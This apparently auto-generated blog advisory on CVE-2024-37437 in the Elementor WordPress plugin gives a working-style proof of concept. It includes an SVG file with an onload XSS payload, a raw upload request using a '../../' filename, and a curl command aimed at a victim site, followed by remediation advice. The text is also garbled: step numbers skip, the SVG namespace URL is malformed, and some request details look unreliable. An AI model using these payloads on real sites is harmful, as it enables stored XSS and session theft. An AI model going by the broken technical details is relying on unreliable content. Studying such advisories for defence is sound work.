CVE CyberSecurity Database News

CVE-2024-37437 - Exploiting Path Traversal and Stored XSS in Elementor Website Builder (<= 3.22.1)

Poster -

Elementor Website Builder is one of the most popular WordPress plugins, empowering over five million sites. Unfortunately, Elementor has had its fair share of security issues. One particularly worrying vulnerability—CVE-2024-37437—opens the door to both path traversal and stored cross-site scripting (XSS).

In this post, we’ll break down what happened, show you how the vulnerability works, demo exploitation with code snippets, and give you links to the original references. If you’re using Elementor 3.22.1 or below, you’re at risk and need to know this.

Versions Affected: All up to 3.22.1

- Impact: Attackers can upload malicious files outside the intended directory, leading to persistent XSS.

What is CVE-2024-37437?

CVE-2024-37437 is a combo bug: it’s an improper limitation of a pathname to a restricted directory (a “path traversal”) vulnerability that happens during certain file uploads in Elementor’s backend. Because the plugin fails to properly sanitize file paths, attackers can smuggle files into unexpected places.

On top of that, crafty attackers can upload files (like crafted SVGs) that inject JavaScript into stored locations. Since Elementor displays these files in posts or pages, victims hit XSS just by visiting the site, no need to click anything.

User uploads a file via Elementor (like media).

2. File path isn’t sanitized–user-controlled input can contain path traversal strings like ../../.

Malicious SVG or HTML file is uploaded with XSS payload.

5. Elementor displays the file inside a page/post—now, the attacker’s JavaScript runs for everyone who visits.

Create a file called evil.svg with stored XSS payload

<!-- evil.svg -->
<svg xmlns="http://www.w3.org/200/svg"; onload="alert('XSS by CVE-2024-37437')"/>

2. Malicious Upload Request

Normally, Elementor restricts file upload paths. Due to path traversal, attackers can POST a request (using Burp Suite, curl, or Postman) like:

POST /wp-admin/admin-ajax.php?action=elementor_upload 
Cookie: [Your WordPress auth]
Content-Type: multipart/form-data; boundary=---------------------------boundary

-----------------------------boundary
Content-Disposition: form-data; name="file"; filename="../../evil.svg"
Content-Type: image/svg+xml

[SVG file contents here]
-----------------------------boundary--

Notice the ../../ in the filename! This tricks Elementor into saving the file up a couple directories, possibly into /wp-content/uploads/evil.svg (or even somewhere worse).

3. Reference the File in Elementor Content

Add an <img src="/wp-content/uploads/evil.svg"> or use Elementor’s UI to include it, if possible. Since Elementor in some contexts allows admins (or editors) to pick uploaded files, it’s trivial to click through the library and add.

4. Stored XSS Hits All Visitors

Now, every time a user with higher permission (like an admin) visits the post/page, the JavaScript runs. If site visitors see the post, they’re at risk too.

Here’s a full PoC using curl

# 1. Log into your WordPress site as a user with file upload rights

# 2. Upload the malicious SVG with path traversal
curl -b "wordpress_logged_in_cookie" -F 'file=@evil.svg;filename=../../evil.svg;type=image/svg+xml' \
  "https://victim-site.com/wp-admin/admin-ajax.php?action=elementor_upload";

# 3. Add <img src="/wp-content/uploads/evil.svg"> to a post/page (through Elementor editor)

# 4. View the page—alert pops up confirming XSS

Impact

- Stored, persistent XSS: The malicious code remains in the post/page.

Path Traversal: Files can overwrite or publish sensitive files outside upload directories.

- Privilege escalation: If an attacker’s XSS payload targets an admin, they might steal cookies, deface the site, or even command WordPress through the session.

Update Elementor to the latest version immediately (3.22.2 or higher, as soon as patched).

- Audit file uploads: Only allow trusted users/roles; restrict allowed file types.

References

- NVD Listing for CVE-2024-37437
- WPScan Advisory DB Entry
- Elementor Changelog
- Path Traversal Attacks Explained (OWASP)
- SVG XSS Vector Reference

Conclusion

CVE-2024-37437 is a classic—and dangerous—WordPress plugin bug that combines a simple file path oversight with the power of XSS. Update your Elementor now, and remember: sanitizing user input and paths isn’t optional, it’s essential.

---

Timeline

Published on: 07/09/2024 11:15:14 UTC
Last modified on: 08/29/2024 18:51:10 UTC